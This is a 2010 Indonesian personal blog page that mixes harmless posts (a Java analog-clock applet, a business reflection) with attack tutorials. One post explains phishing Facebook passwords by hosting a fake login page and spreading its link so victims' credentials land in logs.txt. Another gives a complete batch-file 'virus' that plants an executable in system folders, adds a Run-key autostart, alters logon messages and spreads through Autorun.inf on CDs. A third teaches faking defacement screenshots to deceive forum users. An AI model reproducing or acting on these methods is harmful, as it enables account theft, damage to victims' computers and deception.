http://onesis.webs.com/

Forum Bisnis Fajar Achirudin

Blog

view:  full / summary

Mencuri Password Facebook

Posted by Onesis® on August 23, 2010 at 8:32 AM Comments comments (0)

Facebook telah berhasil menggeser posisi Friendster.

Seperti pendahulunya (friendster) ternyata facebook juga masih mempunyai sebuah celah yang bisa untuk di

bobol dan dapat mengetahui password

siempunya account facebook. Ok disini akan sedikit tentang cara nge-hack facebook hacking password dengan menggunakan Fake Login.

 

Sebelum nya perlu diketahui bahwa cara ini adalah menggunakan fake login, cara ini sedikit sulit karena membutuhkan webhosting. Tapi bila anda seorang blogger yang ngeblog menggunakan wordpress self hosting, maka cara iniakan lebih mudah bagi anda sama saat anda menginstall blog anda kedalam hosting. Jadi bila anda belum mengerti webhosting, silahkan dipelajaridulu dengan googling yang pasti banyak tentang penjelasan itu.

 

Ok bagi yang sudah paham webhosting silahkan melanjutkan dengan masuk ketempat hosting gratis atau berbayar anda. Setelah itu silahkan download file yang telah disiapkan disini Ukurannya juga tidak terlalu besar. Download

 

Setelah selesai anda download, upload file tersebut di hostingan dan lakukan seperti yang ditunjukkan di file “baca_dulu”. Lalu, sebarkan alamat webfacebook palsu anda tersebut ke orang yang ingin anda hack. Passwordakan otomatis tersimpan di file logs.txt bila ada orang yang login lewat web itu. Ok segitu aja tutorial tentang nge-hack facebook hacking password menggunakan fake login.

 

 

Tolong gunakan cara inidengan bijaksana. dan saya tidak bertanggung jawab dengan kemungkinanyang terjadi dengan anda melakukan cara ini. 

 

Jam Analog.java

Posted by Onesis® on May 25, 2010 at 11:16 AM Comments comments (1)

jamAnalog.java

==================================

import java.awt.*;

import java.applet.*;

import java.util.Date;

public class jamAnalog

extends Applet implements Runnable {

// Deklarasi

Thread runner;

public void paint(Graphics g) {

// Membuat latar belakang berwarna putih

g.setColor(Color.white);

g.fillRect(0, 0, size().width, size().height);

// membuat nilai titik tengah dari jendela

Point p = new Point(size().width / 2, size().height / 2);

// Menentukan Panjang Jarum

int jarum_detik = 85, jarum_menit = 69, jarum_jam = 50;

// Mengambil Waktu Sekarang

Date dt = new Date();

int detik = dt.getSeconds();

int menit = dt.getMinutes();

int jam = dt.getHours();

// Menghitung besarnya sudut

double sudut_det = detik * Math.PI * 2 / 60.0;

double sudut_men = menit * Math.PI * 2 / 60.0;

double sudut_jam = jam * Math.PI * 2 / 12.0 + sudut_men / 12.0;

// Menentukan nilai posisi Jarum pada sudut tertentu

int det_x = (int) (p.x + jarum_detik * Math.sin(sudut_det));

int det_y = (int) (p.y - jarum_detik * Math.cos(sudut_det));

int men_x = (int) (p.x + jarum_menit * Math.sin(sudut_men));

int men_y = (int) (p.y - jarum_menit * Math.cos(sudut_men));

int jam_x = (int) (p.x + jarum_jam * Math.sin(sudut_jam));

int jam_y = (int) (p.y - jarum_jam * Math.cos(sudut_jam));

// Membuat lingkaran berwarna hitam (bingkai Jam)

g.setColor(Color.black);

g.drawOval(p.x - 90, p.y - 90, 180, 180);

// Membuat Jarum detik berwarna merah

g.setColor(Color.red);

g.drawLine(p.x, p.y, det_x, det_y);

// Membuat Jarum menit berwarna hitam

g.setColor(Color.black);

g.drawLine(p.x, p.y, men_x, men_y);

// Membuat Jaum jam berwarna biru

g.setColor(Color.BLUE);

g.drawLine(p.x, p.y, jam_x, jam_y);

// Membuat lingkaran pusat

g.setColor(Color.DARK_GRAY);

g.fillOval(p.x - 6, p.y - 6, 12, 12);

// Membuat Tulisan Angka

g.setFont(new Font("Dialog", Font.BOLD, 16));

g.drawString("12", p.x - 4, p.y - 75);

g.drawString("3", p.x + 75, p.y + 2);

g.drawString("6", p.x - 2, p.y + 85);

g.drawString("9", p.x - 85, p.y + 2);

}

public void update(Graphics g) {

paint(g);

}

public void start() {

runner = new Thread(this);

runner.start();

}

public void run() {

while (true) {

try {

// Waktu delay

runner.sleep(1000);

}

catch (Exception e) {}

repaint();

}

}

} // Akhir Kelas

==================

ini pake applet maka perlu ditambahkan dalam file HTML. ini file HTML-nya

<html>

<head>

<title>

Jam Analog

</title>

</head>

<body>

<applet code = "jamAnalog.class" width = "300" height ="250">

</applet>

</body>

</html>


Virus Notepad

Posted by Onesis® on May 25, 2010 at 11:15 AM Comments comments (0)

Cara Buat Virus Sederhana Dari Notepad26 Nopember 2007 — echo

ni virus efeknya g t’lalu bahaya….efek dari virus inicuman mengganti tampilan dari

windows…..tapi cukup bikin kaget juga!!! tapi ygpenting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modifsendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:

- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y

copy image_name(terserah dari nama file gambar pembuat).bmp%systemdrive%\WINDOWS\ /y

copy image_name(terserah dari nama file gambar pembuat).bmp%systemdrive%\WINDOWS\system32\ /y

copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke.exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\/y

copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke.exe,atau file exstensi lain,tampilan file terserah pembuat).exe%systemdrive%\WINDOWS\ /y

copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke.exe,atau file exstensi lain,tampilan file terserah pembuat).exe%systemdrive%\WINDOWS\system32\ /y

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROMLOCAL_HOST(judul title bar)” /f

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTERAND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f

reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambarpembuat).bmp /f

reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f

reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambarpembuat).bmp /f

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /vnama_terserah /d %systemdrive%\windows\system32ama_file(maksudnya file yangdibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilanfile terserah pembuat).exe /f

reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(ataukombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)

- buat Autorun.inf dengan script:

[autorun]

open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)

- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klikkanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY

- copy file-file tsb ke CD

- nikmati efeknya

note:

- jangan disalahgunakan

- maaf kalau pernah diposting

- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masihamatir ….

- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….

- kalau mau buat anti virusnya tinggal di modifikasi nilainya….

Sumber : http://www.yogyafree.net/forum2/viewtopic.php?t=11281

Ditulis dalam Trix. Tag: hack, virus, virus notepad.


Cara jadi Heacker

Posted by Onesis® on May 25, 2010 at 11:13 AM Comments comments (0)

Cara jadi Heacker

Di komunitas maya ini, ada sekelompok orang yang dinamakan (dan menamakan dirinya sendiri) dengan sebutan hacker. Meskipun banyak yang tidak tahu apa arti dan apa yang sebenarnya dilakukan oleh hacker ini, banyak orang yang berpikir kalau hacker = keren.

Ini pasti gara-gara film Matrix/Swordfish/film apapun yang melibatkan komputer super canggih.

Nah, siapa sih yang kaga pengen terlihat keren? (meskipun cuma di depan sekelompok pengagum yang berdomisili di dunia maya)

Bukan gw tentunya. Tapi mungkin ada yang mau. Nah berikut bakal gw kasih tau cara supaya kita bisa terlihat seperti orang yang pinter dalam hal hacking-menghacking tanpa perlu menghabiskan waktu untuk belajar dari ebook ato repot-repot trial and error.

 

1. Bikin file HTML sederhana

Tau kan cara bikin file html…. ato ngga tau? Gak perlu takut, guide ini user-friendly (idiot-proof) kok, pemula juga bisa ikutin.

Gini caranya, pertama-tama klik kanan di desktop. (ga tau desktop? itu loh layar utama yang ada tulisan my computer, recycle bin, dll)

Terus, pilih New > Text Document. Jadi kan file .txt baru, nah kita tinggal buka, terus copy paste kode html sederhana berikut ini (gak harus ikutin sih… tapi yang ga ngerti html mendingan ikutin aja biar cepet)

 

 

<html>

<head>

<title>Error 007</title>

</head>

<body>

<div align=”center”>

<p><b>D1z s1t3 h4z ju5t b33n t8k3n </b></p>

<p><strong>by</strong></p>

<p><b>[NAMA SAMARAN YANG KEREN]</b></p>

<br>

<p><strong>ALL YOUR BASE AER BELONG TO US !!!!111satusatusatusatu </strong></p>

</div>

</body>

</html>

Tulisan di antara div boleh diganti sesuka hati… , jangan lupa ganti [nickname yang keren] dengan nama yang biasa dipake kalo maen CS ato pas lagi chatting.

Abis itu, save as file dengan nama bijikuda.html (bebas sih, tapi pemula lebih baik ikutin contoh)

Yang udah ngerti HTML, bagusnya sih halaman bijikuda.html ini dihias supaya agak persuasif, supaya orang rada percaya kalo ini halaman yang udah dihack.

2. Buka halaman itu di browser (IE, FF, Opera, terserah)

Loh? Gimana caranya nih?

Gampang, tinggal buka aja browser, terus ketik alamatnya.

Alamatnya tau dari mana?

Balik ke desktop, terus klik kanan di file text yang tadi dibikin. Liat locationnya. Di komputer gw, lokasinya ada di C:\Documents and Settings\<nama pc>\Desktop.

Nah, berarti alamatnya filenya adalah C:\Documents and Settings\<nama pc>\Desktop\bijikuda.html

*Klik!*

3. Ganti address dengan website lain

Ganti alamat url, tapi jangan dipencet tombol ‘go’ (atau enter). Tapi, diamkan saja seperti itu, jadinya nanti alamat url akan berubah menjadi alamat beneran, tapi page yang ditampilkan masih bijikuda.html

Ganti url dengan alamat yang keren, misalnya… www.nasa.gov atau… www.presidensby.info atau zhadvance.wordpress.com !

Terus gimana?

Printscreen! Abis itu upload gambarnya, terus post di forum. Jangan lupa bumbui sedikit dengan istilah yang belum tentu dimengerti semua orang, misalnya “ini pake XSS (cross site scripting)…” ato bilang “ini diinject database SQLnya sama gw” atau “liat nih hasil deface gw”.

 

http://i172.photobucket.com/albums/w16/sone_jr/contoh2.gif

 

 

Keliatannya sederhana, tapi mungkin bisa menipu beberapa orang. Perlu diingat, teknik ini pernah dipake sama beberapa orang (yang ngakunya) hacker.

Semoga berhasil!


Agar Bisnis Jadi Lebih Hidup

Posted by Onesis® on May 24, 2010 at 7:19 AM Comments comments (0)
  • DUNIA BISNIS hari ini bisa diibaratkan sebagai sebuah balapan kapal layar di tengah gelapnya malam yang menyimpan banyak kejutan. Setiap peserta balapan mengetahui arah yang dituju melalui petunjuk yang tampak di langit; rasi-rasi bintang. Untuk menjadi pemenang dalam balapan ini, tentu saja nahkoda kapal tidak saja mengandalkan petunjuk bintang di langit. Dia harus mampu memenfaatkan setiap 'celah' di tengah lautan untuk memenangkan balapan. Termasuk sebagai salah satu 'celah' tersebut adalah kemampuan para awak kapal dalam mengoptimalkan kemampuan kapal yang tentunya relatif tidak jauh berbeda dengan kapal para pesaing.

artiny adalah bahwa pemenang sejati dalam dunia bisnis nantinya adalah mereka para nahkoda kapal yang mampu untuk tidak saja membaca petunjuk bintang, tapi juga mampu memanfaatkan seluruh potensi di kapalnya dalam bingkai kreativitas yang kadang terkesan 'nakal' atau 'bengal'.

Itu lah pedoman yang telah aku ibaratkan untuk menjalankan dunia bisnis.




                                                                                    :DNESIS®



Rss_feed

Recent Videos

173 views - 0 comments